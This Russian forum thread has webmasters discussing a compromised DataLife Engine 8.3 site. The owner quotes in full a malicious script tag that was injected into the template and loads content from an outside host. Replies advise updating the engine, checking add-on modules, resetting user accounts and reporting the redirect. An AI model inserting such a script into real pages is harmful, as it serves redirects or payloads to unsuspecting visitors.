Уязвимости в DLE 8.3

SanyaProg
На сайте с 16.07.2010
Offline
156
863

С недавних пор на сайте появилась вот такая гадость:

<script type="text/javascript" src="http://manyy-mob.com/r.php?go=http%3A//manyy-mob.com/jar/%3Ff%3D4482%26m%3D0"></script>

Загружается через код {AJAX} в шаблоне. Как эту фигню можно найти в двиге и как ее могли вообще туда впихнуть? Стоит DLE 8.3. Обновление движка поможет с убором этой каки и закроет ли дыру?

Плюс к тому же в коде самого шаблона были прописаны коды на оперу-мобайл платник, для мобил. Естественно я их сам не ставил.

FinPump - прокачай доход своих сайтов (https://finpump.com)
vandamme
На сайте с 30.11.2008
Offline
675
#1

обновление уберет каку, а вот дыру не факт

[Удален]
#2

Может есть доп модули? Они тоже могут быть с дырками. А так - обновитесь к последней актуальной версии для начала.

SanyaProg
На сайте с 16.07.2010
Offline
156
#3
n1g3r:
Может есть доп модули? Они тоже могут быть с дырками. А так - обновитесь к последней актуальной версии для начала.

Статистика, посл комментарии, топ пользователей, еще что-то. Чую все это рухнет, ну да ладно, пробую обновляться:)

SanyaProg добавил 10.12.2011 в 14:15

Хм, и это не на одном сайте. И везде дле древний. Один обновил, все пропало, то есть коды левые ушли)

Spaike
На сайте с 30.03.2009
Offline
152
#4

не забудьте потереть всех юзеров, они по прежнему имеют доступ к вашей БД, даже если дыру зашить... А на счет мобильного редира стуканите хозяину ПП, чтобы обратили внимание на хулигана.

покупаю сайты

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий